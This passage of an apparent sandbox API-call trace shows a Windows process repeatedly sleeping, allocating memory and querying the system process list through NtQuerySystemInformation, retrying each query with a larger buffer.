NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.846] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.853] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.860] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.867] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.874] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.882] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.889] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.892] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.896] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.903] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.910] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.918] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.925] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.932] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.938] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.945] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.951] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.958] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.964] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.973] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.980] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, 